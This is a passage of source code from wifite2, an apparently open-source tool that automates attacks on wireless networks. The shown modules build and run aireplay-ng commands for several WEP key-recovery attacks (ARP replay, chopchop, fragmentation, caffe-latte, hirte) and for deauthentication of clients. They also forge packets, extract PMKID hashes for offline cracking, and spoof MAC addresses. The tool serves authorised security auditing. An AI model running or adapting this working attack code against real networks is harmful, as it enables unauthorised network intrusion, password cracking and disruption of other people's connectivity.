stdout, stderr)) return hccapx_file @staticmethod def generate_john_file(handshake, show_command=False): john_file = Configuration.temp('generated.john') if os.path.exists(john_file): os.remove(john_file) command = [ 'hcxpcapngtool', '--john', john_file, handshake.capfile ] if show_command: Color.pl('{+} {D}Running: {W}{P}%s{W}' % ' '.join(command)) process = Process(command) stdout, stderr = process.get_output() if not os.path.exists(john_file): raise ValueError('Failed to generate .john file, output: \n%s\n%s' % ( stdout, stderr)) return john_file def get_pmkid_hash(self, pcapng_file): if os.path.exists(self.pmkid_file): os.remove(self.pmkid_file) command = ['hcxpcapngtool', f'--pmkid={self.pmkid_file}', pcapng_file] hcxpcap_proc = Process(command) hcxpcap_proc.wait() if not os.path.exists(self.pmkid_file): return None with open(self.pmkid_file, 'r') as f: output = f.read() # Each line looks like: # hash*bssid*station*essid # Note: The dumptool will record *anything* it finds, ignoring the filterlist. # Check that we got the right target (filter by BSSID) matching_pmkid_hash = None for line in output.split('\n'): fields = line.split('*') if len(fields) >= 3 and fields[1].lower() == self.bssid: # Found it matching_pmkid_hash = line break os.remove(self.pmkid_file) return matching_pmkid_hash wifite2-2.7.0/wifite/tools/iw.py0000755000175000017500000000252314437644461016073 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency class Iw(Dependency): dependency_required = True dependency_name = 'iw' dependency_url = 'apt install iw' @classmethod def mode(cls, iface, mode_name): from ..util.process import Process if mode_name == "monitor": return Process.call(f'iw {iface} set monitor control') else: return Process.call(f'iw {iface} type {mode_name}') @classmethod def get_interfaces(cls, mode=None): from ..util.process import Process import re ireg = re.compile(r"\s+Interface\s[a-zA-Z\d]+") mreg = re.compile(r"\s+type\s[a-zA-Z]+") interfaces = set() iface = '' (out, err) = Process.call('iw dev') if mode is None: for line in out.split('\n'): if ires := ireg.search(line): interfaces.add(ires.group().split("Interface")[-1]) else: for line in out.split('\n'): ires = ireg.search(line) if mres := mreg.search(line): if mode == mres.group().split("type")[-1][1:]: interfaces.add(iface) if ires: iface = ires.group().split("Interface")[-1][1:] return list(interfaces) wifite2-2.7.0/wifite/tools/dependency.py0000755000175000017500000000444514437644461017577 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- class Dependency(object): dependency_name = None dependency_required = None dependency_url = None required_attr_names = ['dependency_name', 'dependency_url', 'dependency_required'] # https://stackoverflow.com/a/49024227 def __init_subclass__(cls): for attr_name in cls.required_attr_names: if attr_name not in cls.__dict__: raise NotImplementedError(f'Attribute "{attr_name}" has not been overridden in class "{cls.__name__}"') @classmethod def exists(cls): from ..util.process import Process return Process.exists(cls.dependency_name) @classmethod def run_dependency_check(cls): from ..util.color import Color from .aircrack import Aircrack from .ip import Ip from .iw import Iw from .bully import Bully from .reaver import Reaver from .tshark import Tshark from .macchanger import Macchanger from .hashcat import Hashcat, HcxDumpTool, HcxPcapngTool apps = [ # Aircrack Aircrack, # Airodump, Airmon, Aireplay, # wireless/net tools Iw, Ip, # WPS Reaver, Bully, # Cracking/handshakes Tshark, # Hashcat Hashcat, HcxDumpTool, HcxPcapngTool, # Misc Macchanger ] missing_required = any(app.fails_dependency_check() for app in apps) if missing_required: Color.pl('{!} {O}At least 1 Required app is missing. Wifite needs Required apps to run{W}') import sys sys.exit(-1) @classmethod def fails_dependency_check(cls): from ..util.color import Color from ..util.process import Process if Process.exists(cls.dependency_name): return False if cls.dependency_required: Color.p('{!} {O}Error: Required app {R}%s{O} was not found' % cls.dependency_name) Color.pl('. {W}install @ {C}%s{W}' % cls.dependency_url) return True else: Color.p('{!} {O}Warning: Recommended app {R}%s{O} was not found' % cls.dependency_name) Color.pl('. {W}install @ {C}%s{W}' % cls.dependency_url) return False wifite2-2.7.0/wifite/tools/aireplay.py0000755000175000017500000004255314437644461017271 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency from ..config import Configuration from ..util.process import Process from ..util.timer import Timer import os import time import re from threading import Thread class WEPAttackType(object): """ Enumeration of different WEP attack types """ fakeauth = 0 replay = 1 chopchop = 2 fragment = 3 caffelatte = 4 p0841 = 5 hirte = 6 forgedreplay = 7 def __init__(self, var): """ Sets appropriate attack name/value given an input. Args: var - Can be a string, number, or WEPAttackType object This object's name & value is set depending on var. """ self.value = None self.name = None if type(var) is int: for (name, value) in list(WEPAttackType.__dict__.items()): if type(value) is int and value == var: self.name = name self.value = value return raise Exception('Attack number %d not found' % var) elif type(var) is str: for (name, value) in list(WEPAttackType.__dict__.items()): if type(value) is int and name == var: self.name = name self.value = value return raise Exception(f'Attack name {var} not found') elif type(var) == WEPAttackType: self.name = var.name self.value = var.value else: raise Exception('Attack type not supported') def __str__(self): return self.name class Aireplay(Thread, Dependency): dependency_required = True dependency_name = 'aireplay-ng' dependency_url = 'https://www.aircrack-ng.org/install.html' def __init__(self, target, attack_type, client_mac=None, replay_file=None): """ Starts aireplay process. Args: target - Instance of Target object, AP to attack. attack_type - str, e.g. 'fakeauth', 'arpreplay', etc. client_mac - MAC address of an associated client. """ super(Aireplay, self).__init__() # Init the parent Thread self.error = None self.status = None self.stdout = None self.xor_percent = None self.target = target self.output_file = Configuration.temp(f'aireplay_{attack_type}.output') self.attack_type = WEPAttackType(attack_type).value self.cmd = Aireplay.get_aireplay_command(self.target, attack_type, client_mac=client_mac, replay_file=replay_file) self.pid = Process(self.cmd, stdout=open(self.output_file, 'a'), stderr=Process.devnull(), cwd=Configuration.temp()) self.start() def is_running(self): return self.pid.poll() is None def stop(self): """ Stops aireplay process """ if hasattr(self, 'pid') and self.pid and self.pid.poll() is None: self.pid.interrupt() def get_output(self): """ Returns stdout from aireplay process """ return self.stdout def run(self): self.stdout = '' self.xor_percent = '0%' while self.pid.poll() is None: time.sleep(0.1) if not os.path.exists(self.output_file): continue # Read output file & clear output file with open(self.output_file, 'r+') as fid: lines = fid.read() self.stdout += lines fid.seek(0) fid.truncate() if Configuration.verbose > 1 and lines.strip() != '': from ..util.color import Color Color.pl('\n{P} [?] aireplay output:\n %s{W}' % lines.strip().replace('\n', '\n ')) for line in lines.split('\n'): line = line.replace('\r', '').strip() if line == '': continue if 'Notice: got a deauth/disassoc packet' in line: self.error = 'Not associated (needs fakeauth)' if self.attack_type == WEPAttackType.fakeauth: # Look for fakeauth status. Potential Output lines: # (START): 00:54:58 Sending Authentication Request (Open System) if 'Sending Authentication Request ' in line or 'Please specify an ESSID' in line: self.status = None # Reset elif 'Got a deauthentication packet!' in line: self.status = False elif 'Sending Authentication Request ' not in line \ and 'Please specify an ESSID' not in line \ and 'Got a deauthentication packet!' not in line \ and 'association successful :-)' in line.lower(): self.status = True elif self.attack_type == WEPAttackType.chopchop: # Look for chopchop status. Potential output lines: # (START) Read 178 packets... read_re = re.compile(r'Read (\d+) packets') if matches := read_re.match(line): self.status = f'Waiting for packet (read {matches[1]})...' # Sent 1912 packets, current guess: 70... sent_re = re.compile(r'Sent (\d+) packets, current guess: (\w+)...') if matches := sent_re.match(line): self.status = f'Generating .xor ({self.xor_percent})... current guess: {matches[2]}' # (DURING) Offset 52 (54% done) | xor = DE | pt = E0 | 152 frames written in 2782ms offset_re = re.compile(r'Offset.*\(\s*(\d+%) done\)') if matches := offset_re.match(line): self.xor_percent = matches[1] self.status = f'Generating .xor ({self.xor_percent})...' # (DONE) Saving keystream in replay_dec-0516-202246.xor saving_re = re.compile(r'Saving keystream in (.*\.xor)') if matches := saving_re.match(line): self.status = matches[1] # (ERROR) fakeauth required if 'try running aireplay-ng in authenticated mode' in line: self.status = 'fakeauth is required and you are not authenticated' elif self.attack_type == WEPAttackType.fragment: # Parse fragment output, update self.status # (START) Read 178 packets... read_re = re.compile(r'Read (\d+) packets') if matches := read_re.match(line): self.status = f'Waiting for packet (read {matches[1]})...' # 01:08:15 Waiting for a data packet... if 'Waiting for a data packet' in line: self.status = 'waiting for packet' # Read 207 packets... trying_re = re.compile(r'Trying to get (\d+) bytes of a keystream') if matches := trying_re.match(line): self.status = f'trying to get {matches[1]}b of a keystream' # 01:08:17 Sending fragmented packet if 'Sending fragmented packet' in line: self.status = 'sending packet' # 01:08:37 Still nothing, trying another packet... if 'Still nothing, trying another packet' in line: self.status = 'sending another packet' # XX:XX:XX Trying to get 1500 bytes of a keystream trying_re = re.compile(r'Trying to get (\d+) bytes of a keystream') if matches := trying_re.match(line): self.status = f'trying to get {matches[1]}b of a keystream' # XX:XX:XX Got RELAYED packet!! if 'Got RELAYED packet' in line: self.status = 'got relayed packet' # XX:XX:XX That's our ARP packet! if 'Thats our ARP packet' in line: self.status = 'relayed packet was our' # XX:XX:XX Saving keystream in fragment-0124-161129.xor saving_re = re.compile(r'Saving keystream in (.*\.xor)') if matches := saving_re.match(line): self.status = f'saving keystream to {matches[1]}' # XX:XX:XX Now you can build a packet with packetforge-ng out of that 1500 bytes keystream else: # Replay, forged replay, etc. # Parse Packets Sent & PacketsPerSecond. Possible output lines: # Read 55 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps) # Read 4467 packets (got 1425 ARP requests and 1417 ACKs), sent 1553 packets...(100 pps) read_re = re.compile(r'Read (\d+) packets \(got (\d+) ARP requests ' r'and (\d+) ACKs\), sent (\d+) packets...\((\d+) pps\)') if matches := read_re.match(line): pps = matches[5] if pps == '0': self.status = 'Waiting for packet...' else: self.status = f'Replaying @ {pps}/sec' def __del__(self): self.stop() @staticmethod def get_aireplay_command(target, attack_type, client_mac=None, replay_file=None): """ Generates aireplay command based on target and attack type Args: target - Instance of Target object, AP to attack. attack_type - int, str, or WEPAttackType instance. client_mac - MAC address of an associated client. replay_file - .Cap file to replay via --arpreplay """ # Interface is required at this point Configuration.initialize() if Configuration.interface is None: raise Exception('Wireless interface must be defined (-i)') cmd = ['aireplay-ng', '--ignore-negative-one'] if client_mac is None and len(target.clients) > 0: # Client MAC wasn't specified, but there's an associated client. Use that. client_mac = target.clients[0].station # type(attack_type) might be str, int, or WEPAttackType. # Find the appropriate attack enum. attack_type = WEPAttackType(attack_type).value if attack_type == WEPAttackType.fakeauth: cmd.extend([ '--fakeauth', '30', # Fake auth every 30 seconds '-Q', # Send re-association packets '-a', target.bssid ]) if target.essid_known: cmd.extend(['-e', target.essid]) elif attack_type == WEPAttackType.replay: cmd.extend([ '--arpreplay', '-b', target.bssid, '-x', str(Configuration.wep_pps) ]) if client_mac: cmd.extend(['-h', client_mac]) elif attack_type == WEPAttackType.chopchop: cmd.extend([ '--chopchop', '-b', target.bssid, '-x', str(Configuration.wep_pps), # '-m', '60', # Minimum packet length (bytes) # '-n', '82', # Maximum packet length '-F' # Automatically choose first packet ]) if client_mac: cmd.extend(['-h', client_mac]) elif attack_type == WEPAttackType.fragment: cmd.extend([ '--fragment', '-b', target.bssid, '-x', str(Configuration.wep_pps), '-m', '100', # Minimum packet length (bytes) '-F' # Automatically choose first packet ]) if client_mac: cmd.extend(['-h', client_mac]) elif attack_type == WEPAttackType.caffelatte: if len(target.clients) == 0: # Unable to carry out caffe-latte attack raise Exception('Client is required for caffe-latte attack') cmd.extend([ '--caffe-latte', '-b', target.bssid, '-h', target.clients[0].station ]) elif attack_type == WEPAttackType.p0841: cmd.extend([ '--arpreplay', '-b', target.bssid, '-c', 'ff:ff:ff:ff:ff:ff', '-x', str(Configuration.wep_pps), '-F', # Automatically choose first packet '-p', '0841' ]) if client_mac: cmd.extend(['-h', client_mac]) elif attack_type == WEPAttackType.hirte: if client_mac is None: # Unable to carry out hirte attack raise Exception('Client is required for hirte attack') cmd.extend([ '--cfrag', '-h', client_mac ]) elif attack_type == WEPAttackType.forgedreplay: if client_mac is None or replay_file is None: raise Exception('Client_mac and Replay_File are required for arp replay') cmd.extend([ '--arpreplay', '-b', target.bssid, '-h', client_mac, '-r', replay_file, '-F', # Automatically choose first packet '-x', str(Configuration.wep_pps) ]) else: raise Exception(f'Unexpected attack type: {attack_type}') cmd.append(Configuration.interface) return cmd @staticmethod def get_xor(): """ Finds the last .xor file in the directory """ xor = None for fil in os.listdir(Configuration.temp()): if fil.startswith('replay_') and fil.endswith('.xor') or \ fil.startswith('fragment-') and fil.endswith('.xor'): xor = fil return xor @staticmethod def forge_packet(xor_file, bssid, station_mac): """ Forges packet from .xor file """ forged_file = 'forged.cap' cmd = [ 'packetforge-ng', '-0', '-a', bssid, # Target MAC '-h', station_mac, # Client MAC '-k', '192.168.1.2', # Dest IP '-l', '192.168.1.100', # Source IP '-y', xor_file, # Read PRNG from .xor file '-w', forged_file, # Write to Configuration.interface ] cmd = f""""{'" "'.join(cmd)}\"""" (out, err) = Process.call(cmd, cwd=Configuration.temp(), shell=True) if out.strip() == f'Wrote packet to: {forged_file}': return forged_file from ..util.color import Color Color.pl('{!} {R}failed to forge packet from .xor file{W}') Color.pl('output:\n"%s"' % out) return None @staticmethod def deauth(target_bssid, essid=None, client_mac=None, num_deauths=None, timeout=2): num_deauths = num_deauths or Configuration.num_deauths deauth_cmd = [ 'aireplay-ng', '-0', # Deauthentication str(num_deauths), '--ignore-negative-one', '-a', target_bssid, # Target AP '-D' # Skip AP detection ] if client_mac is not None: # Station-specific deauth deauth_cmd.extend(['-c', client_mac]) if essid: deauth_cmd.extend(['-e', essid]) deauth_cmd.append(Configuration.interface) proc = Process(deauth_cmd) while proc.poll() is None: if proc.running_time() >= timeout: proc.interrupt() time.sleep(0.2) @staticmethod def fakeauth(target, timeout=5, num_attempts=3): """ Tries a one-time fake-authenticate with a target AP. Params: target (py.Target): Instance of py.Target timeout (int): Time to wait for fakeuth to succeed. num_attempts (int): Number of fakeauth attempts to make. Returns: (bool): True if fakeauth succeeds, otherwise False """ cmd = [ 'aireplay-ng', '-1', '0', # Fake auth, no delay '-a', target.bssid, '-T', str(num_attempts) ] if target.essid_known: cmd.extend(['-e', target.essid]) cmd.append(Configuration.interface) fakeauth_proc = Process(cmd, devnull=False, cwd=Configuration.temp()) timer = Timer(timeout) while fakeauth_proc.poll() is None and not timer.ended(): time.sleep(0.1) if fakeauth_proc.poll() is None or timer.ended(): fakeauth_proc.interrupt() return False output = fakeauth_proc.stdout() return 'association successful' in output.lower() if __name__ == '__main__': t = WEPAttackType(4) print((t.name, type(t.name), t.value)) t = WEPAttackType('caffelatte') print((t.name, type(t.name), t.value)) t = WEPAttackType(t) print((t.name, type(t.name), t.value)) wifite2-2.7.0/wifite/tools/ip.py0000755000175000017500000000225114437644461016062 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import re from .dependency import Dependency class Ip(Dependency): dependency_required = True dependency_name = 'ip' dependency_url = 'apt install iproute2' @classmethod def up(cls, interface): """Put interface up""" from ..util.process import Process (out, err) = Process.call(f'ip link set {interface} up') if len(err) > 0: raise Exception('Error putting interface %s up:\n%s\n%s' % (interface, out, err)) @classmethod def down(cls, interface): """Put interface down""" from ..util.process import Process (out, err) = Process.call(f'ip link set {interface} down') if len(err) > 0: raise Exception('Error putting interface %s down:\n%s\n%s' % (interface, out, err)) @classmethod def get_mac(cls, interface): from ..util.process import Process (out, err) = Process.call(f'ip link show {interface}') if match := re.search(r'([a-fA-F\d]{2}[-:]){5}[a-fA-F\d]{2}', out): return match[0].replace('-', ':') raise Exception(f'Could not find the mac address for {interface}') wifite2-2.7.0/wifite/tools/macchanger.py0000755000175000017500000000524514437644461017550 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency from ..tools.ip import Ip from ..util.color import Color class Macchanger(Dependency): dependency_required = False dependency_name = 'macchanger' dependency_url = 'apt install macchanger' is_changed = False @classmethod def down_macch_up(cls, iface, options): """Put interface down, run macchanger with options, put interface up""" from ..util.process import Process Color.clear_entire_line() Color.p('\r{+} {C}macchanger{W}: taking interface {C}%s{W} down...' % iface) Ip.down(iface) Color.clear_entire_line() Color.p('\r{+} {C}macchanger{W}: changing mac address of interface {C}%s{W}...' % iface) command = ['macchanger'] command.extend(options) command.append(iface) macch = Process(command) macch.wait() if macch.poll() != 0: Color.pl('\n{!} {R}macchanger{O}: error running {R}%s{O}' % ' '.join(command)) Color.pl('{!} {R}output: {O}%s, %s{W}' % (macch.stdout(), macch.stderr())) return False Color.clear_entire_line() Color.p('\r{+} {C}macchanger{W}: bringing interface {C}%s{W} up...' % iface) Ip.up(iface) return True @classmethod def get_interface(cls): # Helper method to get interface from configuration from ..config import Configuration return Configuration.interface @classmethod def reset(cls): iface = cls.get_interface() Color.pl('\r{+} {C}macchanger{W}: resetting mac address on %s...' % iface) # -p to reset to permanent MAC address if cls.down_macch_up(iface, ['-p']): new_mac = Ip.get_mac(iface) Color.clear_entire_line() Color.pl('\r{+} {C}macchanger{W}: reset mac address back to {C}%s{W} on {C}%s{W}' % (new_mac, iface)) @classmethod def random(cls): from ..util.process import Process if not Process.exists('macchanger'): Color.pl('{!} {R}macchanger: {O}not installed') return iface = cls.get_interface() Color.pl('\n{+} {C}macchanger{W}: changing mac address on {C}%s{W}' % iface) # -r to use random MAC address # -e to keep vendor bytes the same if cls.down_macch_up(iface, ['-e']): cls.is_changed = True new_mac = Ip.get_mac(iface) Color.clear_entire_line() Color.pl('\r{+} {C}macchanger{W}: changed mac address to {C}%s{W} on {C}%s{W}' % (new_mac, iface)) @classmethod def reset_if_changed(cls): if cls.is_changed: cls.reset() wifite2-2.7.0/wifite/tools/tshark.py0000755000175000017500000001670614437644461016760 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency from ..model.target import WPSState from ..util.process import Process import re class Tshark(Dependency): """ Wrapper for Tshark program. """ dependency_required = False dependency_name = 'tshark' dependency_url = 'apt install wireshark' def __init__(self): pass @staticmethod def _extract_src_dst_index_total(line): # Extract BSSIDs, handshake # (1-4) and handshake 'total' (4) mac_regex = ('[a-zA-Z0-9]{2}:' * 6)[:-1] match = re.search(r'(%s)\s*.*\s*(%s).*Message.*(\d).*of.*(\d)' % (mac_regex, mac_regex), line) if match is None: # Line doesn't contain src, dst, Message numbers return None, None, None, None (src, dst, index, total) = match.groups() return src, dst, index, total @staticmethod def _build_target_client_handshake_map(output, bssid=None): # Map of target_ssid,client_ssid -> handshake #s # E.g. 12:34:56,21:43:65 -> 3 target_client_msg_nums = {} for line in output.split('\n'): src, dst, index, total = Tshark._extract_src_dst_index_total(line) if src is None: continue # Skip index = int(index) total = int(total) if total != 4: continue # Handshake X of 5? X of 3? Skip it. # Identify the client and target MAC addresses if index % 2 == 1: # First and Third messages target = src client = dst else: # Second and Fourth messages client = src target = dst if bssid is not None and bssid.lower() != target.lower(): # We know the BSSID and this msg was not for the target continue target_client_key = f'{target},{client}' # Ensure all 4 messages are: # Between the same client and target (not different clients connecting). # In numeric & chronological order (Message 1, then 2, then 3, then 4) if index == 1: target_client_msg_nums[target_client_key] = 1 # First message elif target_client_key not in target_client_msg_nums \ or index - 1 != target_client_msg_nums[target_client_key]: continue # Not first message. We haven't gotten the first message yet. Skip. else: # Happy case: Message is > 1 and is received in-order target_client_msg_nums[target_client_key] = index return target_client_msg_nums @staticmethod def bssids_with_handshakes(capfile, bssid=None): if not Tshark.exists(): return [] # Returns list of BSSIDs for which we have valid handshakes in the capfile. command = [ 'tshark', '-r', capfile, '-n', # Don't resolve addresses '-Y', 'eapol' # Filter for only handshakes ] tshark = Process(command, devnull=False) target_client_msg_nums = Tshark._build_target_client_handshake_map(tshark.stdout(), bssid=bssid) bssids = set() # Check if we have all 4 messages for the handshake between the same MACs for (target_client, num) in list(target_client_msg_nums.items()): if num == 4: # We got a handshake! this_bssid = target_client.split(',')[0] bssids.add(this_bssid) return list(bssids) @staticmethod def bssid_essid_pairs(capfile, bssid): # Finds all BSSIDs (with corresponding ESSIDs) from cap file. # Returns list of tuples(BSSID, ESSID) if not Tshark.exists(): return [] ssid_pairs = set() command = [ 'tshark', '-r', capfile, # Path to cap file '-n', # Don't resolve addresses # Extract beacon frames '-Y', '"wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05"', ] tshark = Process(command, devnull=False) for line in tshark.stdout().split('\n'): # Extract src, dst, and essid mac_regex = ('[a-zA-Z0-9]{2}:' * 6)[:-1] match = re.search(f'({mac_regex}) [^ ]* ({mac_regex}).*.*SSID=(.*)$', line) if match is None: continue # Line doesn't contain src, dst, ssid (src, dst, essid) = match.groups() if dst.lower() == 'ff:ff:ff:ff:ff:ff': continue # Skip broadcast packets if (bssid is not None and bssid.lower() == src.lower()) or bssid is None: ssid_pairs.add((src, essid)) # This is our BSSID, add it return list(ssid_pairs) @staticmethod def check_for_wps_and_update_targets(capfile, targets): """ Given a cap file and list of targets, use TShark to find which BSSIDs in the cap file use WPS. Then update the 'wps' flag for those BSSIDs in the targets. Args: capfile - .cap file from airodump containing packets targets - list of Targets from scan, to be updated """ if not Tshark.exists(): raise ValueError('Cannot detect WPS networks: Tshark does not exist') command = [ 'tshark', '-r', capfile, # Path to cap file '-n', # Don't resolve addresses # Filter WPS broadcast packets '-Y', 'wps.wifi_protected_setup_state && wlan.da == ff:ff:ff:ff:ff:ff', '-T', 'fields', # Only output certain fields '-e', 'wlan.ta', # BSSID '-e', 'wps.ap_setup_locked', # Locked status '-E', 'separator=,' # CSV ] p = Process(command) try: p.wait() lines = p.stdout() except Exception as e: if isinstance(e, KeyboardInterrupt): raise KeyboardInterrupt from e return wps_bssids = set() locked_bssids = set() for line in lines.split('\n'): if ',' not in line: continue bssid, locked = line.split(',') if '1' not in locked: wps_bssids.add(bssid.upper()) else: locked_bssids.add(bssid.upper()) for t in targets: target_bssid = t.bssid.upper() if target_bssid in wps_bssids: t.wps = WPSState.UNLOCKED elif target_bssid in locked_bssids: t.wps = WPSState.LOCKED else: t.wps = WPSState.NONE if __name__ == '__main__': test_file = './tests/files/contains_wps_network.cap' target_bssid = 'A4:2B:8C:16:6B:3A' from ..model.target import Target fields = [ 'A4:2B:8C:16:6B:3A', # BSSID '2015-05-27 19:28:44', '2015-05-27 19:28:46', # Dates '11', # Channel '54', # throughput 'WPA2', 'CCMP TKIP', 'PSK', # AUTH '-58', '2', '0', '0.0.0.0', '9', # ??? 'Test Router Please Ignore', # SSID ] t = Target(fields) targets = [t] # Should update 'wps' field of a target Tshark.check_for_wps_and_update_targets(test_file, targets) print(f'Target(BSSID={targets[0].bssid}).wps = {targets[0].wps} (Expected: 1)') assert targets[0].wps == WPSState.UNLOCKED print((Tshark.bssids_with_handshakes(test_file, bssid=target_bssid))) wifite2-2.7.0/wifite/tools/hostapd.py0000755000175000017500000000153114437644461017114 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency class Hostapd(Dependency): dependency_required = False dependency_name = 'hostapd' dependency_url = 'apt install hostapd' pid = None @classmethod def run(cls, iface, target): with open('/tmp/hostapd.conf', 'w') as fout: fout.write(f'interface={iface}' + '\n') fout.write(f'ssid={target.essid}' + '\n') fout.write(f'channel={target.channel}' + '\n') fout.write('driver=nl80211\n') # command = [ # 'hostapd', # '/tmp/hostapd.conf' # ] # process = Process(command) return None @classmethod def stop(cls): if hasattr(cls, 'pid') and cls.pid and cls.pid.poll() is None: cls.pid.interrupt() return None wifite2-2.7.0/wifite/util/0000755000175000017500000000000014437644461014712 5ustar sophiesophiewifite2-2.7.0/wifite/util/__init__.py0000755000175000017500000000000014437644461017014 0ustar sophiesophiewifite2-2.7.0/wifite/util/process.py0000755000175000017500000001566014437644461016755 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import time import signal import os from subprocess import Popen, PIPE from ..util.color import Color from ..config import Configuration class Process(object): """ Represents a running/ran process """ @staticmethod def devnull(): """ Helper method for opening devnull """ return open('/dev/null', 'w') @staticmethod def call(command, cwd=None, shell=False): """ Calls a command (either string or list of args). Returns tuple: (stdout, stderr) """ if type(command) is not str or ' ' in command or shell: shell = True if Configuration.verbose > 1: Color.pe('\n {C}[?] {W} Executing (Shell): {B}%s{W}' % command) else: shell = False if Configuration.verbose > 1: Color.pe('\n {C}[?]{W} Executing: {B}%s{W}' % command) pid = Popen(command, cwd=cwd, stdout=PIPE, stderr=PIPE, shell=shell) pid.wait() (stdout, stderr) = pid.communicate() # Python 3 compatibility if type(stdout) is bytes: stdout = stdout.decode('utf-8') if type(stderr) is bytes: stderr = stderr.decode('utf-8') if Configuration.verbose > 1 and stdout is not None and stdout.strip() != '': Color.pe('{P} [stdout] %s{W}' % '\n [stdout] '.join(stdout.strip().split('\n'))) if Configuration.verbose > 1 and stderr is not None and stderr.strip() != '': Color.pe('{P} [stderr] %s{W}' % '\n [stderr] '.join(stderr.strip().split('\n'))) return stdout, stderr @staticmethod def exists(program): """ Checks if program is installed on this system """ if Configuration.initialized and program in set(Configuration.existing_commands.keys()): return Configuration.existing_commands[program] p = Process(['which', program]) stdout = p.stdout().strip() stderr = p.stderr().strip() exist = not stdout == stderr == '' if Configuration.initialized: Configuration.existing_commands.update({program: exist}) return exist def __init__(self, command, devnull=False, stdout=PIPE, stderr=PIPE, cwd=None, bufsize=0, stdin=PIPE): """ Starts executing command """ if type(command) is str: # Commands have to be a list command = command.split(' ') self.command = command if Configuration.verbose > 1: Color.pe('\n {C}[?] {W} Executing: {B}%s{W}' % ' '.join(command)) self.out = None self.err = None if devnull: sout = Process.devnull() serr = Process.devnull() else: sout = stdout serr = stderr self.start_time = time.time() self.pid = Popen(command, stdout=sout, stderr=serr, stdin=stdin, cwd=cwd, bufsize=bufsize) def __del__(self): """ Ran when object is GC'd. If process is still running at this point, it should die. """ try: if self.pid and self.pid.poll() is None: self.interrupt() except AttributeError: pass def stdout(self): """ Waits for process to finish, returns stdout output """ self.get_output() if Configuration.verbose > 1 and self.out is not None and self.out.strip() != '': Color.pe('{P} [stdout] %s{W}' % '\n [stdout] '.join(self.out.strip().split('\n'))) return self.out def stderr(self): """ Waits for process to finish, returns stderr output """ self.get_output() if Configuration.verbose > 1 and self.err is not None and self.err.strip() != '': Color.pe('{P} [stderr] %s{W}' % '\n [stderr] '.join(self.err.strip().split('\n'))) return self.err def stdoutln(self): return self.pid.stdout.readline() def stderrln(self): return self.pid.stderr.readline() def stdin(self, text): if self.pid.stdin: self.pid.stdin.write(text.encode('utf-8')) self.pid.stdin.flush() def get_output(self): """ Waits for process to finish, sets stdout & stderr """ if self.pid.poll() is None: self.pid.wait() if self.out is None: (self.out, self.err) = self.pid.communicate() if type(self.out) is bytes: self.out = self.out.decode('utf-8') if type(self.err) is bytes: self.err = self.err.decode('utf-8') return self.out, self.err def poll(self): """ Returns exit code if process is dead, otherwise 'None' """ return self.pid.poll() def wait(self): self.pid.wait() def running_time(self): """ Returns number of seconds since process was started """ return int(time.time() - self.start_time) def interrupt(self, wait_time=2.0): """ Send interrupt to current process. If process fails to exit within `wait_time` seconds, terminates it. """ try: pid = self.pid.pid cmd = self.command if type(cmd) is list: cmd = ' '.join(cmd) if Configuration.verbose > 1: Color.pe('\n {C}[?] {W} sending interrupt to PID %d (%s)' % (pid, cmd)) os.kill(pid, signal.SIGINT) start_time = time.time() # Time since Interrupt was sent while self.pid.poll() is None: # Process is still running try: time.sleep(0.1) if time.time() - start_time > wait_time: # We waited too long for process to die, terminate it. if Configuration.verbose > 1: Color.pe('\n {C}[?] {W} Waited > %0.2f seconds for process to die, killing it' % wait_time) os.kill(pid, signal.SIGTERM) self.pid.terminate() break except KeyboardInterrupt: # wait the cleanup continue except OSError as e: if 'No such process' in e.__str__(): return raise e # process cannot be killed if __name__ == '__main__': Configuration.initialize(False) p = Process('ls') print((p.stdout())) print((p.stderr())) p.interrupt() # Calling as list of arguments (out, err) = Process.call(['ls', '-lah']) print(out) print(err) print('\n---------------------\n') # Calling as string (out, err) = Process.call('ls -l | head -2') print(out) print(err) print(f""""reaver" exists: {Process.exists('reaver')}""") # Test on never-ending process p = Process('yes') print('Running yes...') time.sleep(1) print('yes should stop now') # After program loses reference to instance in 'p', process dies. wifite2-2.7.0/wifite/util/scanner.py0000755000175000017500000002332214437644461016722 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from time import sleep, time from ..config import Configuration from ..tools.airodump import Airodump from ..util.color import Color class Scanner(object): """ Scans wifi networks & provides menu for selecting targets """ # Console code for moving up one line UP_CHAR = '\033[1A' def __init__(self): self.previous_target_count = 0 self.target_archives = {} self.targets = [] self.target = None # Target specified by user (based on ESSID/BSSID) self.err_msg = None def find_targets(self): """ Scans for targets via Airodump. Loops until scan is interrupted via user or config. Sets this object `targets` attribute (list[Target]) on interruption """ max_scan_time = Configuration.scan_time # Loads airodump with interface/channel/etc from Configuration try: with Airodump() as airodump: # Loop until interrupted (Ctrl+C) scan_start_time = time() while True: if airodump.pid.poll() is not None: return True # Airodump process died self.targets = airodump.get_targets(old_targets=self.targets, target_archives=self.target_archives) if self.found_target(): return True # We found the target we want if airodump.pid.poll() is not None: return True # Airodump process died self.print_targets() target_count = len(self.targets) client_count = sum(len(t.clients) for t in self.targets) outline = '\r{+} Scanning' if airodump.decloaking: outline += ' & decloaking' outline += '. Found' outline += ' {G}%d{W} target(s),' % target_count outline += ' {G}%d{W} client(s).' % client_count outline += ' {O}Ctrl+C{W} when ready ' Color.clear_entire_line() Color.p(outline) if max_scan_time > 0 and time() > scan_start_time + max_scan_time: return True sleep(1) except KeyboardInterrupt: if not Configuration.infinite_mode: return True options = '({G}s{W}{D}, {W}{R}e{W})' prompt = '{+} Do you want to {G}start attacking{W} or {R}exit{W}%s?' % options self.print_targets() Color.clear_entire_line() Color.p(prompt) answer = input().lower() return not answer.startswith('e') def update_targets(self): """ Archive all the old targets Returns: True if user wants to stop attack, False otherwise """ self.previous_target_count = 0 # for target in self.targets: # self.target_archives[target.bssid] = ArchivedTarget(target) self.targets = [] return self.find_targets() def get_num_attacked(self): """ Returns: number of attacked targets by this scanner 